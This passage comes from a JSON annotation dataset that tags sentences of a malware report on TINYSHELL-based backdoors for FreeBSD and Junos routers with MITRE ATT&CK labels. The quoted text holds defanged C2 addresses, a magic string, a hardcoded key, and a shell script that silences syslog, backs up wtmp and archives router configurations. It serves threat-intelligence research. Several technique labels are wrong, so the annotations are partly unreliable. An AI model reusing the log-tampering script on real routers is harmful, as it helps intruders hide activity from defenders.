"start": 8, "end": 17, "label": "MalwareTool" }, { "text": "FreeBSD", "start": 37, "end": 44, "label": "Infrastructure_Indicator" }, { "text": "customized backdoors", "start": 82, "end": 102, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s44-ed427d", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 44, "context_before": "A basic TINYSHELL implementation for FreeBSD seems to be a foundation for heavily customized backdoors detailed as follows.", "sentence_text": "It is derived from the publicly available TINYSHELL source code with additional supported commands.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "derived from publicly available TINYSHELL source code with additional supported commands", "entities": [ { "text": "TINYSHELL", "start": 42, "end": 51, "label": "MalwareTool" }, { "text": "source code", "start": 52, "end": 63, "label": "Infrastructure_Indicator" }, { "text": "derived from", "start": 6, "end": 18, "label": "Action" }, { "text": "additional supported commands", "start": 69, "end": 98, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s45-f82962", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 45, "context_before": "It is derived from the publicly available TINYSHELL source code with additional supported commands.", "sentence_text": "It is an active backdoor that communicates to the following hardcoded command and control (C2) servers:\nTCP://129[.]126[.]109[.]50:22\nTCP://116[.]88[.]34[.]184:22\nTCP://223[.]25[.]78[.]136:22\nTCP://45[.]77[.]39[.]28:22\nORB network\n, eventually leading to a single, backend Adversary Controlled Operations Server (“ACOS”).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "communicates to the following hardcoded command and control (C2) servers", "entities": [ { "text": "ORB network", "start": 219, "end": 230, "label": "Infrastructure_Indicator" }, { "text": "Adversary Controlled Operations Server", "start": 273, "end": 311, "label": "Infrastructure_Indicator" }, { "text": "communicates", "start": 30, "end": 42, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s46-3511ae", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 46, "context_before": "It is an active backdoor that communicates to the following hardcoded command and control (C2) servers:\nTCP://129[.]126[.]109[.]50:22\nTCP://116[.]88[.]34[.]184:22\nTCP://223[.]25[.]78[.]136:22\nTCP://45[.]77[.]39[.]28:22\nORB network\n, eventually leading to a single, backend Adversary Controlled Operations Server (“ACOS”).", "sentence_text": "This malware begins by communicating to a random C2 server from the list.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "communicating to a random C2 server from the list", "entities": [ { "text": "C2 server", "start": 49, "end": 58, "label": "Infrastructure_Indicator" }, { "text": "communicating", "start": 23, "end": 36, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s47-61c028", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 47, "context_before": "This malware begins by communicating to a random C2 server from the list.", "sentence_text": "The malware maintains two TCP sockets that will stay synchronized with the same C2 address.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "malware maintains two TCP sockets that will stay synchronized with the same C2 address", "entities": [ { "text": "TCP sockets", "start": 26, "end": 37, "label": "Infrastructure_Indicator" }, { "text": "C2 address", "start": 80, "end": 90, "label": "Infrastructure_Indicator" }, { "text": "maintains", "start": 12, "end": 21, "label": "Action" }, { "text": "synchronized", "start": 53, "end": 65, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s48-dba08c", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 48, "context_before": "The malware maintains two TCP sockets that will stay synchronized with the same C2 address.", "sentence_text": "One socket is used for tasking requests and the other is for handling requests.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "One socket is used for tasking requests and the other is for handling requests", "entities": [ { "text": "socket", "start": 4, "end": 10, "label": "Infrastructure_Indicator" }, { "text": "tasking requests", "start": 23, "end": 39, "label": "Action" }, { "text": "handling requests", "start": 61, "end": 78, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s49-bc82d7", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 49, "context_before": "One socket is used for tasking requests and the other is for handling requests.", "sentence_text": "The malware will rotate through the list of C2 servers until a successful connection is created and it will request a task using the first socket.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1008", "name": "Fallback Channels" } ], "procedure": "malware will rotate through the list of C2 servers until a successful connection is created", "entities": [ { "text": "C2 servers", "start": 44, "end": 54, "label": "Infrastructure_Indicator" }, { "text": "socket", "start": 139, "end": 145, "label": "Infrastructure_Indicator" }, { "text": "rotate", "start": 17, "end": 23, "label": "Action" }, { "text": "malware", "start": 4, "end": 11, "label": "MalwareTool" }, { "text": "request a task", "start": 108, "end": 122, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s50-2c6ea4", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 50, "context_before": "The malware will rotate through the list of C2 servers until a successful connection is created and it will request a task using the first socket.", "sentence_text": "After receiving a task from the C2, the malware then creates a second socket for handling this specific task.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "malware creates a second socket for handling a specific task received from the C2", "entities": [ { "text": "C2", "start": 32, "end": 34, "label": "Infrastructure_Indicator" }, { "text": "socket", "start": 70, "end": 76, "label": "Infrastructure_Indicator" }, { "text": "malware", "start": 40, "end": 47, "label": "MalwareTool" }, { "text": "receiving a task", "start": 6, "end": 22, "label": "Action" }, { "text": "creates a second socket ", "start": 53, "end": 77, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s51-625c68", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 51, "context_before": "After receiving a task from the C2, the malware then creates a second socket for handling this specific task.", "sentence_text": "After the task is finished, the second socket is closed.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "second socket is closed", "entities": [ { "text": "socket", "start": 39, "end": 45, "label": "Infrastructure_Indicator" }, { "text": "finished,", "start": 18, "end": 27, "label": "Action" }, { "text": "closed", "start": 49, "end": 55, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s52-170104", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 52, "context_before": "After the task is finished, the second socket is closed.", "sentence_text": "The malware encrypts all network traffic with AES using a hard-coded key.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "encrypts all network traffic with a hard-coded key", "entities": [ { "text": "AES", "start": 46, "end": 49, "label": "MalwareTool" }, { "text": "encrypts", "start": 12, "end": 20, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s53-a0979e", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 53, "context_before": "The malware encrypts all network traffic with AES using a hard-coded key.", "sentence_text": "The following commands are supported by malware, consisting of standard TINYSHELL commands and added proxy and reconfiguration capabilities:", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "malware supports standard TINYSHELL commands with added proxy and reconfiguration capabilities", "entities": [ { "text": "TINYSHELL", "start": 72, "end": 81, "label": "MalwareTool" }, { "text": "malware", "start": 40, "end": 47, "label": "MalwareTool" }, { "text": "added proxy and reconfiguration capabilities", "start": 95, "end": 139, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s54-eabb2e", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 54, "context_before": "The following commands are supported by malware, consisting of standard TINYSHELL commands and added proxy and reconfiguration capabilities:", "sentence_text": "The following is the list of configuration items that can be changed by the command number 5 (tshd_config) and their associated config menu numbers:\nto — TINYSHELL-Based Active Backdoor Sample two, named to , is the same as Sample 1 but with different hardcoded C2 servers:", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1565.001", "name": "Stored Data Manipulation" } ], "procedure": "TINYSHELL-based backdoor has variants differing only by hardcoded C2 servers (tshd_config command)", "entities": [ { "text": "tshd_config", "start": 94, "end": 105, "label": "MalwareTool" }, { "text": "TINYSHELL", "start": 154, "end": 163, "label": "MalwareTool" }, { "text": "C2 servers", "start": 262, "end": 272, "label": "Infrastructure_Indicator" }, { "text": "changed", "start": 61, "end": 68, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s55-9ac31e", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 55, "context_before": "The following is the list of configuration items that can be changed by the command number 5 (tshd_config) and their associated config menu numbers:\nto — TINYSHELL-Based Active Backdoor Sample two, named to , is the same as Sample 1 but with different hardcoded C2 servers:", "sentence_text": "It acts as a libpcap-based packet sniffer and receives commands by inspecting packets on the wire looking for a magic-string that activates its backdoor capabilities.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1040", "name": "Network Sniffing" } ], "procedure": "libpcap-based packet sniffer, receives commands by inspecting packets", "entities": [ { "text": "inspecting packets", "start": 67, "end": 85, "label": "Action" }, { "text": "activates its backdoor capabilities", "start": 130, "end": 165, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s56-acc3d1", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 56, "context_before": "It acts as a libpcap-based packet sniffer and receives commands by inspecting packets on the wire looking for a magic-string that activates its backdoor capabilities.", "sentence_text": "Malware supports 2 modes of operation: active mode, in which it will connect to a provided C2 address, or a passive - listening mode.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Malware supports active mode (connect) or a passive - listening mode", "entities": [ { "text": "C2 address", "start": 91, "end": 101, "label": "Infrastructure_Indicator" }, { "text": "connect", "start": 69, "end": 76, "label": "Action" }, { "text": "Malware", "start": 0, "end": 7, "label": "MalwareTool" }, { "text": "active mode", "start": 39, "end": 50, "label": "Infrastructure_Indicator" }, { "text": "supports 2 modes of operation", "start": 8, "end": 37, "label": "Action" }, { "text": "passive - listening mode", "start": 108, "end": 132, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-93_mitre_report-p1-s57-bb5b4e", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 57, "context_before": "Malware supports 2 modes of operation: active mode, in which it will connect to a provided C2 address, or a passive - listening mode.", "sentence_text": "In addition to 3 standard TINYSHELL commands, it implements 2 custom commands and a custom activation routine.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "implements 2 custom commands and a custom activation routine", "entities": [ { "text": "TINYSHELL", "start": 26, "end": 35, "label": "MalwareTool" }, { "text": "implements 2 custom commands", "start": 49, "end": 77, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s58-ddba2f", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 58, "context_before": "In addition to 3 standard TINYSHELL commands, it implements 2 custom commands and a custom activation routine.", "sentence_text": "The malware uses libpcap library to capture all network packets on the host (interface specified in the eth environment variable) matching the BPF filter of icmp[4:2] == 0xaa56 .", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1040", "name": "Network Sniffing" } ], "procedure": "Uses the libpcap library to capture network packets on the host that match a specific BPF filter condition.", "entities": [ { "text": "malware", "start": 4, "end": 11, "label": "MalwareTool" }, { "text": "libpcap library", "start": 17, "end": 32, "label": "MalwareTool" }, { "text": "uses libpcap library to capture all network packets on the host", "start": 12, "end": 75, "label": "Action" }, { "text": "network packets", "start": 48, "end": 63, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-93_mitre_report-p1-s59-29a15a", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 59, "context_before": "The malware uses libpcap library to capture all network packets on the host (interface specified in the eth environment variable) matching the BPF filter of icmp[4:2] == 0xaa56 .", "sentence_text": "It reads 16 bytes of data starting at offset 10 from the ICMP packet.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1572", "name": "Protocol Tunneling" } ], "procedure": "reads 16 bytes of data starting at offset 10", "entities": [ { "text": "ICMP", "start": 57, "end": 61, "label": "Infrastructure_Indicator" }, { "text": "reads", "start": 3, "end": 8, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s60-e44f89", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 60, "context_before": "It reads 16 bytes of data starting at offset 10 from the ICMP packet.", "sentence_text": "The malware has insufficient bounds checking and could read past the end of a packet payload if a smaller than expected packet is encountered.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s61-ca7617", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 61, "context_before": "The malware has insufficient bounds checking and could read past the end of a packet payload if a smaller than expected packet is encountered.", "sentence_text": "For any ICMP type code 8 (Echo request) packets, it reads the 16 bytes of data and decrypts it with a single byte XOR key 0x86", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "reads 16 bytes of ICMP data and decrypts it with a single byte XOR key 0x86", "entities": [ { "text": "ICMP type code 8 (Echo request) packets,", "start": 8, "end": 48, "label": "Infrastructure_Indicator" }, { "text": "reads the 16 bytes of data", "start": 52, "end": 78, "label": "Action" }, { "text": "decrypts it", "start": 83, "end": 94, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s62-e63360", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 62, "context_before": "For any ICMP type code 8 (Echo request) packets, it reads the 16 bytes of data and decrypts it with a single byte XOR key 0x86", "sentence_text": "It then compares the decrypted data with a magic string uSarguuS62bKRA0J .", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "compares the decrypted data with a magic string", "entities": [ { "text": "uSarguuS62bKRA0J", "start": 56, "end": 72, "label": "MalwareTool" }, { "text": "compares", "start": 8, "end": 16, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s63-156cee", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 63, "context_before": "It then compares the decrypted data with a magic string uSarguuS62bKRA0J .", "sentence_text": "If the string matches and the byte 8 of the ICMP packet matches ascii character or , it then reads the target IP and TCP port number from the ICMP packet and establishes a TCP connection to the specified IP (active mode).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1572", "name": "Protocol Tunneling" } ], "procedure": "reads target IP and TCP port number from the ICMP packet and establishes a TCP connection", "entities": [ { "text": "ICMP packet", "start": 44, "end": 55, "label": "Infrastructure_Indicator" }, { "text": "byte 8", "start": 30, "end": 36, "label": "Infrastructure_Indicator" }, { "text": "ascii character", "start": 64, "end": 79, "label": "Infrastructure_Indicator" }, { "text": "IP (active mode)", "start": 204, "end": 220, "label": "Infrastructure_Indicator" }, { "text": "reads the target IP and TCP port number from the ICMP packet", "start": 93, "end": 153, "label": "Action" }, { "text": "establishes a TCP connection", "start": 158, "end": 186, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s64-87463b", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 64, "context_before": "If the string matches and the byte 8 of the ICMP packet matches ascii character or , it then reads the target IP and TCP port number from the ICMP packet and establishes a TCP connection to the specified IP (active mode).", "sentence_text": "It uses a custom AES and HMAC implementation to encrypt and authenticate the communication.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "encrypt and authenticate the communication", "entities": [ { "text": "AES ", "start": 17, "end": 21, "label": "MalwareTool" }, { "text": "HMAC", "start": 25, "end": 29, "label": "MalwareTool" }, { "text": "encrypt", "start": 48, "end": 55, "label": "Action" }, { "text": "authenticate", "start": 60, "end": 72, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s65-ebceeb", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 65, "context_before": "It uses a custom AES and HMAC implementation to encrypt and authenticate the communication.", "sentence_text": "It uses a hardcoded key string WZtOTig2m42gXB6U to derive session keys and a hardcoded authentication token 58 90 AE 86 F1 B9 1C F6 29 83 95 71 1D DE 58 0D to authenticate a target.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s66-48bc6e", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 66, "context_before": "It uses a hardcoded key string WZtOTig2m42gXB6U to derive session keys and a hardcoded authentication token 58 90 AE 86 F1 B9 1C F6 29 83 95 71 1D DE 58 0D to authenticate a target.", "sentence_text": "After authenticating a connection to a target host it starts encrypted communication.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "starts encrypted communication", "entities": [ { "text": "authenticating", "start": 6, "end": 20, "label": "Action" }, { "text": "starts", "start": 54, "end": 60, "label": "Action" }, { "text": "target host", "start": 39, "end": 50, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-93_mitre_report-p1-s67-06d7f3", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 67, "context_before": "After authenticating a connection to a target host it starts encrypted communication.", "sentence_text": "lmpad — TINYSHELL-Based Utility and Passive Backdoor Sample four, named lmpad is an utility and a passive backdoor written in C.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s68-9e245c", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 68, "context_before": "lmpad — TINYSHELL-Based Utility and Passive Backdoor Sample four, named lmpad is an utility and a passive backdoor written in C.", "sentence_text": "In addition to standard TINYSHELL capabilities it can also launch an external script that can perform process injection into two legitimate Junos OS processes to inhibit logging.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "perform process injection into two legitimate Junos OS processes to inhibit logging", "entities": [ { "text": "TINYSHELL", "start": 24, "end": 33, "label": "MalwareTool" }, { "text": "Junos OS", "start": 140, "end": 148, "label": "Infrastructure_Indicator" }, { "text": "perform process injection", "start": 94, "end": 119, "label": "Action" }, { "text": "inhibit logging", "start": 162, "end": 177, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s69-657325", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 69, "context_before": "In addition to standard TINYSHELL capabilities it can also launch an external script that can perform process injection into two legitimate Junos OS processes to inhibit logging.", "sentence_text": "The main purpose of this malware is to disable all possible logging before the operator connects to the router to perform hands-on activities and then later restore the logs after the operator disconnects.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "disable all possible logging, restore the logs", "entities": [ { "text": "malware", "start": 25, "end": 32, "label": "MalwareTool" }, { "text": "operator", "start": 79, "end": 87, "label": "ThreatActor" }, { "text": "router ", "start": 104, "end": 111, "label": "Infrastructure_Indicator" }, { "text": "disable all possible logging", "start": 39, "end": 67, "label": "Action" }, { "text": "restore the logs", "start": 157, "end": 173, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s70-bfcb32", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 70, "context_before": "The main purpose of this malware is to disable all possible logging before the operator connects to the router to perform hands-on activities and then later restore the logs after the operator disconnects.", "sentence_text": "The malware begins by attempting to receive a UDP packet on port 33615, where it receives an RC4 encrypted message and sends an acknowledgement message in response.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1095", "name": "Non-Application Layer Protocol" } ], "procedure": "receive a UDP packet on port 33615", "entities": [ { "text": "RC4 ", "start": 93, "end": 97, "label": "MalwareTool" }, { "text": "UDP packet", "start": 46, "end": 56, "label": "Infrastructure_Indicator" }, { "text": "malware", "start": 4, "end": 11, "label": "MalwareTool" }, { "text": "receive", "start": 36, "end": 43, "label": "Action" }, { "text": "sends an acknowledgement message", "start": 119, "end": 151, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s71-b3ea6f", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 71, "context_before": "The malware begins by attempting to receive a UDP packet on port 33615, where it receives an RC4 encrypted message and sends an acknowledgement message in response.", "sentence_text": "The malware also checks the decrypted received payload against the following hex bytes, terminating the connection if it doesn't match.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "checks the decrypted received payload, terminating the connection", "entities": [ { "text": "malware", "start": 4, "end": 11, "label": "MalwareTool" }, { "text": "checks the decrypted received payload", "start": 17, "end": 54, "label": "Action" }, { "text": "terminating the connection if it doesn't match", "start": 88, "end": 134, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s72-f87a6d", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 72, "context_before": "The malware also checks the decrypted received payload against the following hex bytes, terminating the connection if it doesn't match.", "sentence_text": "Command\nThis command inhibits logging in preparation of hands-on threat actor activity on the router.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.002", "name": "Disable Windows Event Logging" } ], "procedure": "inhibits logging in preparation of hands-on threat actor activity", "entities": [ { "text": "threat actor", "start": 65, "end": 77, "label": "ThreatActor" }, { "text": "inhibits logging", "start": 21, "end": 37, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s73-d47ac6", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 73, "context_before": "Command\nThis command inhibits logging in preparation of hands-on threat actor activity on the router.", "sentence_text": "It begins by writing a compressed zip archive to the file /var/tmp/pfed_jdhcp6_trace.log .", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "writing a compressed zip archive", "entities": [ { "text": "/var/tmp/pfed_jdhcp6_trace.log", "start": 58, "end": 88, "label": "Infrastructure_Indicator" }, { "text": "writing a compressed zip archive", "start": 13, "end": 45, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s74-e5b757", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 74, "context_before": "It begins by writing a compressed zip archive to the file /var/tmp/pfed_jdhcp6_trace.log .", "sentence_text": "It then executes the following command line to decompress the archive, execute an embedded script with argument pre and clean up the script after execution:\ngzip -d /var/tmp/pfed_jdhcp6_trace.log -c > /var/tmp/pfed_jdhcp6_trace.log.bak;\nsh /var/tmp/pfed_jdhcp6_trace.log.bak pre ;", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "executes the following command line", "entities": [ { "text": "/var/tmp/pfed_jdhcp6_trace.log.bak", "start": 201, "end": 235, "label": "Infrastructure_Indicator" }, { "text": "executes", "start": 8, "end": 16, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s75-15779c", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 75, "context_before": "It then executes the following command line to decompress the archive, execute an embedded script with argument pre and clean up the script after execution:\ngzip -d /var/tmp/pfed_jdhcp6_trace.log -c > /var/tmp/pfed_jdhcp6_trace.log.bak;\nsh /var/tmp/pfed_jdhcp6_trace.log.bak pre ;", "sentence_text": "rm -rf /var/tmp/pfed_jdhcp6_trace.log /var/tmp/pfed_jdhcp6_trace.log.bak ;\nkill -9 $$ The following is the uncompressed script file:\npre_ssh() {\n#closelog\ncp /mfs/var/etc/syslog.conf /mfs/var/etc/syslog.conf0 sed -i '' 's/\\/dev\\/null #//g' /mfs/var/etc/syslog.conf0 sed -i '' 's/ / \\/dev\\/null #/g' /mfs/var/etc/syslog.conf ps -fcA |grep eventd | awk '{ print $1 }' | xargs kill -1 #last cp -r /var/log/utx.log /var/log/utx.log0 cp -r /var/log/wtmp /var/log/wtmp0 }", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.002", "name": "Clear Linux or Mac System Logs" } ], "procedure": "Modifies syslog.conf and kills eventd process to inhibit logging, then removes staging files (Anti-forensics)", "entities": [ { "text": "/var/tmp/pfed_jdhcp6_trace.log", "start": 7, "end": 37, "label": "Infrastructure_Indicator" }, { "text": "/var/tmp/pfed_jdhcp6_trace.log.bak", "start": 38, "end": 72, "label": "Infrastructure_Indicator" }, { "text": "/var/log/utx.log", "start": 411, "end": 427, "label": "Infrastructure_Indicator" }, { "text": "/var/log/wtmp", "start": 435, "end": 448, "label": "Infrastructure_Indicator" }, { "text": "rm", "start": 0, "end": 2, "label": "Action" }, { "text": "kill", "start": 75, "end": 79, "label": "Action" }, { "text": "cp", "start": 155, "end": 157, "label": "Action" }, { "text": "sed", "start": 209, "end": 212, "label": "Action" }, { "text": "grep", "start": 333, "end": 337, "label": "Action" }, { "text": "xargs", "start": 368, "end": 373, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s76-839f53", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 76, "context_before": "rm -rf /var/tmp/pfed_jdhcp6_trace.log /var/tmp/pfed_jdhcp6_trace.log.bak ;\nkill -9 $$ The following is the uncompressed script file:\npre_ssh() {\n#closelog\ncp /mfs/var/etc/syslog.conf /mfs/var/etc/syslog.conf0 sed -i '' 's/\\/dev\\/null #//g' /mfs/var/etc/syslog.conf0 sed -i '' 's/ / \\/dev\\/null #/g' /mfs/var/etc/syslog.conf ps -fcA |grep eventd | awk '{ print $1 }' | xargs kill -1 #last cp -r /var/log/utx.log /var/log/utx.log0 cp -r /var/log/wtmp /var/log/wtmp0 }", "sentence_text": "post_ssh() { #relog cp /mfs/var/etc/syslog.conf0 /mfs/var/etc/syslog.conf rm -f /mfs/var/etc/syslog.conf0 ps -fcA | grep eventd | awk '{ print $1 }' | xargs kill -1 #relast cp -r /var/log/wtmp0 /var/log/wtmp cp -r /var/log/utx.log /var/log/utx.log0 rm -f /var/log/wtmp0 } backup() { #backconf rm -rf /var/rundb+ cp -r /var/rundb /var/rundb+ cp /var/db/commits /usr/lib/libjucomm.so.1 tar -cf /config/usage_db /config/juniper.conf.*", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.002", "name": "Clear Linux or Mac System Logs" } ], "procedure": "Restores original syslog configuration, deletes cleanup artifacts, and archives the router's main configuration files (juniper.conf.*)", "entities": [ { "text": "/mfs/var/etc/syslog.conf", "start": 23, "end": 47, "label": "Infrastructure_Indicator" }, { "text": "cp", "start": 20, "end": 22, "label": "Action" }, { "text": "/var/log/wtmp", "start": 179, "end": 192, "label": "Infrastructure_Indicator" }, { "text": "kill", "start": 157, "end": 161, "label": "Action" }, { "text": "rm", "start": 74, "end": 76, "label": "Action" }, { "text": "tar", "start": 384, "end": 387, "label": "Action" }, { "text": "/config/juniper.conf", "start": 409, "end": 429, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-93_mitre_report-p1-s77-6b943c", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 77, "context_before": "post_ssh() { #relog cp /mfs/var/etc/syslog.conf0 /mfs/var/etc/syslog.conf rm -f /mfs/var/etc/syslog.conf0 ps -fcA | grep eventd | awk '{ print $1 }' | xargs kill -1 #relast cp -r /var/log/wtmp0 /var/log/wtmp cp -r /var/log/utx.log /var/log/utx.log0 rm -f /var/log/wtmp0 } backup() { #backconf rm -rf /var/rundb+ cp -r /var/rundb /var/rundb+ cp /var/db/commits /usr/lib/libjucomm.so.1 tar -cf /config/usage_db /config/juniper.conf.*", "sentence_text": "tar -cf /var/db/config/usage_db /var/db/config/juniper.conf.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1560.001", "name": "Archive via Utility" } ], "procedure": "Archiving configuration files", "entities": [ { "text": "tar", "start": 0, "end": 3, "label": "Action" }, { "text": "/var/db/config/usage_db /var/db/config/juniper.conf", "start": 8, "end": 59, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-93_mitre_report-p1-s78-908618", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 78, "context_before": "tar -cf /var/db/config/usage_db /var/db/config/juniper.conf.", "sentence_text": 